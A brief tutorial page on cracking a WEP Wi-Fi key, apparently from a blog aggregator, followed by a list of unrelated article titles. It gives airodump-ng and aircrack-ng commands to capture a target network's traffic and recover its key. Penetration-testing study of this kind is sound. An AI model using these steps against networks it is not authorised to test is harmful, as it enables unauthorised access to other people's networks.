WEP Cracking Basic case

Run airdump-ng to log all traffic from the target network.

airodump-ng --channel [channel] --bssid [bssid] --write [file-name][interface]

At the same time, we shall use aircrack-ng to try and crack the key using the capture file created by the above command.

aircrack-ng [file-name]

Keep both programs running at the same time and aircrack-ng will be able to determine the key when the number of IV's in the cap file is enough.

最新文章

  1. 打电话,发短信,发邮件,app跳转
  2. CoIDE在STM32系列单片机中的使用实践
  3. Number To Indian Rupee Words in Oracle Forms / Reports
  4. pyqt记录内容(音乐播放器)
  5. Servlet编程实例2
  6. 在.NET Core类库中使用EF Core迁移数据库到SQL Server
  7. vs2017 .net core 项目调试浏览器网页闪退Bug
  8. spring_AOP
  9. Java编码与乱码问题
  10. 如何将wordpress所有文章批量改为已发布状态
  11. Visual Studio 2015 开发Android Cordova出现unsupported major minor version 52.0错误的解决方法
  12. 常用加密算法简单整理以及spring securiy使用bcrypt加密
  13. ZJOI2019day1退役记
  14. android软键盘弹出引起的各种不适终极解决方案
  15. JQuery UI - draggable(转)
  16. [loss]Triphard loss优雅的写法
  17. Qt5_容器_知识点记录
  18. linux进程概论
  19. 【nginx】解决nginx搭建图片服务器访问图片404
  20. spring实战学习笔记(一)spring装配bean

热门文章

  1. 小白的mapbox学习之路-显示地图
  2. 基于NACOS和JAVA反射机制动态更新JAVA静态常量非@Value注解
  3. Beta冲刺<3/10>
  4. 并发编程-CPU执行volatile原理探讨-可见性与原子性的深入理解
  5. Flutter学习笔记(38)--自定义控件之组合控件
  6. SSM登录拦截验证
  7. VulnHub CengBox2靶机渗透
  8. vue全家桶(4.3)
  9. Asp.net Core依赖注入(Autofac替换IOC容器)
  10. .NET Core WEB API接口参数模型绑定